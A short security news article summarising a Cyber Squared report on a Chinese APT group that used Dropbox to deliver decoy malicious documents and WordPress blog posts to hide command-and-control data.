Chinese hackers abuse major cloud-based platforms in all the phases of their attacks, a new report found.
The Chinese Advanced Persistent Threat (APT) group that targeted The New York Times last year used Dropbox and WordPress to carry out its missions, said researchers from Cyber Squared in a new report.
In the first phase of the attack, the APT group uploaded malicious files to a free Dropbox account and sent links to the binaries, via email, to the targets.
The advantage of using Dropbox is because the attackers anonymize themselves, and they mask their intentions behind the trusted Dropbox brand. In addition, the malicious content ends up delivered via a method that evades traditional detection and mitigation systems.
The file hosted on Dropbox appears to be a harmless document, for example a policy document from the Association of Southeast Asian Nations (ASEAN).
In reality, when the victim opens the document, it is able to exploit vulnerabilities in the software installed on the targeted computer in an effort to drop a piece of malware. To avoid raising any suspicion, a legitimate document displays.
Once the threat infects a computer, the second phase of the attack starts. The malware connects to a WordPress blog from which it retrieves command and control (C&C) information.
The C&C data hides in plain sight within news articles related to geopolitical events.
“This serves as yet another example of how sophisticated threats are successfully leveraging trusted SPI to facilitate the initial targeting and C2 phases of their exploitation operations. Few enterprise net defense teams are adequately resourced or enabled to detect targeted attacks and subsequent C2 web sessions that use trusted SPI chaining techniques,” Cyber Squared said.